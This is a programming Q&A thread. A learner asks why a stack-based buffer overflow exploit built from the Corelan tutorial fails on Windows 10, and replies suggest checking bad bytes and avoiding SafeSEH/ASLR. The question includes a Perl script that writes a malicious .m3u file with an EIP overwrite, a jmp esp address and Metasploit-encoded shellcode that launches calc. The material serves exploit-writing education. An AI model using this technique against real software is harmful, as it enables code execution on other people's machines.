Reputation: 13
I am following corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ to reproduce the exploit.
Firstly, I found the position of EIP was after the 26089
A
s (at 0016F454
), and the ESP was 4
characters after EIP (at 0016F45C
) according to the following code:
my $file= "eipcrash.m3u";
my $junk= "A" x 26089;
my $eip = pack('V', 0x444444);
my $shellcode = "\x90" x 4 ;
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
Results: https://i.sstatic.net/LmPG8.png
I find the pointer to jmp-esp
instruction by !mona find -type instr -s "jmp esp" -x X
. I use 0x7457AC5B
one.
Results: https://i.sstatic.net/iUoVY.png
I carefully made everything looked working. Finalized code:
my $file= "eipcrash.m3u";
my $junk= "A" x 26089;
my $eip = pack('V', 0x7457AC5B); #0x6F90E8EC 0x1001B058 0x7457AC5B
my $shellcode = "\x90" x 4 ;
# windows/exec - 144 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=seh, CMD=calc
$shellcode = $shellcode .
"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" .
"\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" .
"\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" .
"\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96" .
"\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b" .
"\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" .
"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" .
"\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" .
"\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" .
"\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" .
"\x7f\xe8\x7b\xca";
open($FILE,">$file");
print $FILE $junk.$eip.$shellcode;
close($FILE);
print "m3u File Created successfully\n";
Final results: https://i.sstatic.net/JSwKt.png
It just doesn't work! I believe that my EIP and position of shellcode are correct, so the problem might be the effectiveness of the shellcode. I tried shellcodes of launching calc.exe
from a different website, but none worked.
Why isn't it working? I'm using Windows 10 x64. Please guide me since I've been stuck on this for weeks, and I have scrutinized similar problems' articles on the web. I've really got no idea.
Thanks in advance.
Upvotes: 1
Views: 2298
Reputation: 121
Did you check for bad bytes? Quite often certain bytes are used by file parsers as magic markers and can cause your shellcode to not be copied in full or translated to corrupt shell code. You can use the bytearray feature of mona to assist you with identifying bad bytes (https://www.corelan.be/index.php/2011/07/14/mona-py-the-manual/)
Upvotes: 0
Reputation: 697
pvefindaddr j -r esp -n -o
(Immunity Debugger or anything). And it's always better to avoid "SafeSEH" and "ASLR".Upvotes: 1